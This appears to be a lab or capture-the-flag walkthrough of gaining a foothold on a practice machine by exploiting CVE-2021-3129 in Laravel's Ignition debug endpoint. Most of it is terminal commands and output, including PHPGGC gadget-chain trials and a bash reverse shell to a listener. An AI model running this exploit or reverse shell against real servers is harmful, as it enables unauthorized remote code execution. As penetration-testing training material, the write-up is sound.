CVE-2021-3129
The target Laravel instance appears to be vulnerable to CVE-2021-3129 due to its outdated version and option to enable the debug mode
Laravel Log Path
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ python3 CVE-2021-3129.py --host http://192.168.201.38/
_____ _____ ___ __ ___ _ _____ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |__|__ / |_ ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_, /
\___| \_/ |___| /___\__/___|_| |___/_/___|/_/
https://github.com/joshuavanderpoll/CVE-2021-3129
Using PHPGGC: https://github.com/ambionics/phpggc
[@] Starting the exploit on "http://192.168.201.38/"...
[@] Testing vulnerable URL "http://192.168.201.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[•] Use "?" for a list of all available actions.
[?] Please enter a command to execute :
Executing the exploit automatically finds the Laravel log path; /var/www/html/lavita/storage/logs/laravel.log
Commands
[?] Please enter a command to execute : ?
[•] Available commands
exit - Exit program..
help - Show available commands..
clear_logs - Clear Laravel logs..
execute <command> - Execute system command..
write <text> - Write to log file..
patch <env/index/private> - Patch the vulnerability..
patches - Detailed information about patch modes.
There are several commands available within the exploit
I’ll go with the execute
command
PHPGGC
[?] Please enter a command to execute : execute id
[@] Executing command "id"...
[@] Generating payload...
[!] Required binary PHPGGC not found.
[@] Downloading PHPGGC from "ambionics/phpggc" GitHub repository...
[√] Downloaded/extracted PHPGGC.
[@] Updating PHPGGC execution permissions...
[√] Updated PHPGGC execution permissions.
PHP Deprecated: Creation of dynamic property Illuminate\Validation\Rules\RequiredIf::$condition is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/8/gadgets.php on line 22
PHP Deprecated: Creation of dynamic property Illuminate\Broadcasting\BroadcastEvent::$connection is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/9/gadgets.php on line 46
ERROR: Phar requires either a __destruct or a __wakeup vector
PHP Deprecated: Creation of dynamic property Illuminate\Broadcasting\PendingBroadcast::$event is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/11/gadgets.php on line 22
PHP Deprecated: Creation of dynamic property Illuminate\Broadcasting\PendingBroadcast::$events is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Laravel/RCE/11/gadgets.php on line 23
PHP Deprecated: Creation of dynamic property Monolog\LogRecord::$mixed is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Monolog/RCE/8/gadgets.php on line 18
PHP Deprecated: Creation of dynamic property Monolog\LogRecord::$mixed is deprecated in /home/kali/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129/phpggc-master/gadgetchains/Monolog/RCE/9/gadgets.php on line 35
[√] Generated 21 payloads.
[@] Trying chain laravel/rce1 [1/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Output :
[√] Working chain found. You have now access to the 'patch' functionality.
[?] Would you like to try the next chain? [Y/N] :
Executing a system command automatically downloads the PHPGGC tool, and generates all 21 available payloads. The first payload, laravel/rce1, appears to have failed as it does not show any output.
[?] Would you like to try the next chain? [Y/N] : Y
[@] Trying chain laravel/rce2 [2/21]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Output :
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[?] Would you like to try the next chain? [Y/N] : N
Moving on to the next payload, laravel/rce2, succeeded I will stick to the second gadget
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ python3 CVE-2021-3129.py --host http://192.168.201.38/ --chain laravel/rce2 --exec 'bash -c "bash -i >& /dev/tcp/192.168.45.249/9999 0>&1"'
_____ _____ ___ __ ___ _ _____ ___ ___
/ __\ \ / / __|_|_ ) \_ ) |__|__ / |_ ) _ \
| (__ \ V /| _|___/ / () / /| |___|_ \ |/ /_, /
\___| \_/ |___| /___\__/___|_| |___/_/___|/_/
https://github.com/joshuavanderpoll/CVE-2021-3129
Using PHPGGC: https://github.com/ambionics/phpggc
[@] Starting the exploit on "http://192.168.201.38/"...
[@] Testing vulnerable URL "http://192.168.201.38/_ignition/execute-solution"...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Laravel seems to be running on a Linux based machine.
[√] Laravel log path: "/var/www/html/lavita/storage/logs/laravel.log".
[•] Laravel version found: "8.4.0".
[@] Clearing Laravel logs...
[√] Cleared Laravel logs!
[@] Executing command "bash -c "bash -i >& /dev/tcp/192.168.45.249/9999 0>&1""...
[@] Generating payload...
[√] Generated 1 payloads.
[@] Trying chain laravel/rce2 [1/1]...
[@] Clearing logs...
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payloads...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
Executing the exploit script with a reverse shell payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/lavita/CVE-2021-3129]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.201.38] 37766
bash: cannot set terminal process group (605): Inappropriate ioctl for device
bash: no job control in this shell
www-data@debian:/$ whoami
whoami
www-data
www-data@debian:/$ hostname
hostname
debian
www-data@debian:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:2c:5d brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.201.38/24 brd 192.168.201.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:fe9e:2c5d/64 scope link
valid_lft forever preferred_lft forever
Initial Foothold established to the target system as the www-data
account via exploiting CVE-2021-3129